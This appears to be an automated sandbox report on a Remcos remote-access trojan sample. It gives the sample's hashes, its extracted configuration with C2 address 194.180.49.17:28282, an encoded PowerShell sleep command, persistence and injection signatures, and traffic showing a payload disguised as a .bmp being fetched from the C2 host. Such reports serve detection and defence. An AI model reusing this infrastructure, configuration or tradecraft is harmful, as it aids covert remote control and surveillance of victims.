Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03/02/2023, 18:44 UTC

General

  • Target

    d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe

  • Size

    7KB

  • MD5

    b359f4af5c88b1e237db9738415b7682

  • SHA1

    d7fa6d87594ea4d8b5740d54fdc204b08f4e9439

  • SHA256

    53ddb9a75bca1115a66745b28086afbd394cef38f8437dda641b1219111df8cd

  • SHA512

    6d4f06f36c608d3202d29629f9d9a70eadfbffbb23c7c074fbb610ed9e1926bf6e04c8dfecbbaf1d575fb2d0385d237aff2dbda322b092d4ef7728091eb596cb

  • SSDEEP

    96:xtEsKVeCVIP7bLp8LAn5c8aY1ej/kKV+J2qzNt:xUVVIP7bLrEOejcKYx

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

194.180.49.17:28282

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    rdfghfgjkgoighjc.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    true

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-PC1DJ2

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
    "C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:688
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4788
    • C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
      C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
      2⤵
      PID:3184
      • C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
        C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
        2⤵
        • Checks computer location settings
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:4244
        • C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe
          "C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2108
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1844
          • C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe
            C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of SetWindowsHookEx
            PID:4688

    Network

    • flag-nl
      GET
      http://194.180.49.17/Vvlhkp.bmp
      d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
      Remote address:
      194.180.49.17:80
      Request
      GET /Vvlhkp.bmp HTTP/1.1
      Host: 194.180.49.17
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Content-Type: image/bmp
      Last-Modified: Fri, 03 Feb 2023 02:52:01 GMT
      Accept-Ranges: bytes
      ETag: "cbc6437d7a37d91:0"
      Server: Microsoft-IIS/10.0
      Date: Fri, 03 Feb 2023 18:44:22 GMT
      Content-Length: 5437440
    • flag-nl
      GET
      http://194.180.49.17/Vvlhkp.bmp
      rdfghfgjkgoighjc.exe
      Remote address:
      194.180.49.17:80
      Request
      GET /Vvlhkp.bmp HTTP/1.1
      Host: 194.180.49.17
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Content-Type: image/bmp
      Last-Modified: Fri, 03 Feb 2023 02:52:01 GMT
      Accept-Ranges: bytes
      ETag: "cbc6437d7a37d91:0"
      Server: Microsoft-IIS/10.0
      Date: Fri, 03 Feb 2023 18:45:12 GMT
      Content-Length: 5437440
    • flag-us
      DNS
      geoplugin.net
      rdfghfgjkgoighjc.exe
      Remote address:
      8.8.8.8:53
      Request
      geoplugin.net
      IN A
      Response
      geoplugin.net
      IN A
      178.237.33.50
    • flag-nl
      GET
      http://geoplugin.net/json.gp
      rdfghfgjkgoighjc.exe
      Remote address:
      178.237.33.50:80
      Request
      GET /json.gp HTTP/1.1
      Host: geoplugin.net
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      date: Fri, 03 Feb 2023 18:45:36 GMT
      server: Apache
      expires: Fri, 03 Feb 2023 18:45:36 GMT
      content-length: 930
      content-type: application/json; charset=utf-8
      cache-control: public, max-age=300
      access-control-allow-origin: *
    • 93.184.221.240:80
      260 B
      5
    • 194.180.49.17:80
      http://194.180.49.17/Vvlhkp.bmp
      http
      d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
      199.2kB
      5.8MB
      3132
      4168

      HTTP Request

      GET http://194.180.49.17/Vvlhkp.bmp

      HTTP Response

      200
    • 93.184.220.29:80
      322 B
      7
    • 93.184.221.240:80
      322 B
      7
    • 104.80.225.205:443
      322 B
      7
    • 194.180.49.17:80
      rdfghfgjkgoighjc.exe
      260 B
      5
    • 13.69.239.73:443
      322 B
      7
    • 194.180.49.17:80
      http://194.180.49.17/Vvlhkp.bmp
      http
      rdfghfgjkgoighjc.exe
      110.7kB
      5.6MB
      2222
      4013

      HTTP Request

      GET http://194.180.49.17/Vvlhkp.bmp

      HTTP Response

      200
    • 194.180.49.17:28282
      tls
      rdfghfgjkgoighjc.exe
      2.9kB
      1.4kB
      12
      14
    • 178.237.33.50:80
      http://geoplugin.net/json.gp
      http
      rdfghfgjkgoighjc.exe
      301 B
      1.3kB
      5
      3

      HTTP Request

      GET http://geoplugin.net/json.gp

      HTTP Response

      200
    • 8.8.8.8:53
      geoplugin.net
      dns
      rdfghfgjkgoighjc.exe
      59 B
      75 B
      1
      1

      DNS Request

      geoplugin.net

      DNS Response

      178.237.33.50

    Downloads

    • C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe

      Filesize

      7KB

      MD5

      b359f4af5c88b1e237db9738415b7682

      SHA1

      d7fa6d87594ea4d8b5740d54fdc204b08f4e9439

      SHA256

      53ddb9a75bca1115a66745b28086afbd394cef38f8437dda641b1219111df8cd

      SHA512

      6d4f06f36c608d3202d29629f9d9a70eadfbffbb23c7c074fbb610ed9e1926bf6e04c8dfecbbaf1d575fb2d0385d237aff2dbda322b092d4ef7728091eb596cb

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      1KB

      MD5

      4280e36a29fa31c01e4d8b2ba726a0d8

      SHA1

      c485c2c9ce0a99747b18d899b71dfa9a64dabe32

      SHA256

      e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

      SHA512

      494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

      Filesize

      53KB

      MD5

      06ad34f9739c5159b4d92d702545bd49

      SHA1

      9152a0d4f153f3f40f7e606be75f81b582ee0c17

      SHA256

      474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

      SHA512

      c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      1210b299f9239432a1e7b06d65bf7304

      SHA1

      3ae3e66b37e6f10753e32e1bf72a612b297b395e

      SHA256

      e35e5dc177e469252adac3cd093231d57cb60af30a8c5508e1c7fddabcdf69d1

      SHA512

      3de3b7dc783556398d1ecaffe9c9bcb3470d0568913b5fee23d20db4821b312370fc9f505a911544f82297fb01cd13df1aec2620dbdcbb226304ab0353ed4f6f

    • memory/688-133-0x0000000000A90000-0x0000000000A98000-memory.dmp

      Filesize

      32KB

    • memory/688-134-0x0000000007A50000-0x0000000007A72000-memory.dmp

      Filesize

      136KB

    • memory/4244-147-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4244-145-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4244-151-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4244-146-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4688-163-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4688-162-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4688-161-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4688-160-0x0000000000400000-0x0000000000480000-memory.dmp

      Filesize

      512KB

    • memory/4788-138-0x00000000057C0000-0x0000000005826000-memory.dmp

      Filesize

      408KB

    • memory/4788-136-0x0000000004910000-0x0000000004946000-memory.dmp

      Filesize

      216KB

    • memory/4788-137-0x0000000004F80000-0x00000000055A8000-memory.dmp

      Filesize

      6.2MB

    • memory/4788-139-0x0000000005830000-0x0000000005896000-memory.dmp

      Filesize

      408KB

    • memory/4788-140-0x0000000005E90000-0x0000000005EAE000-memory.dmp

      Filesize

      120KB

    • memory/4788-141-0x0000000007700000-0x0000000007D7A000-memory.dmp

      Filesize

      6.5MB

    • memory/4788-142-0x0000000006390000-0x00000000063AA000-memory.dmp

      Filesize

      104KB
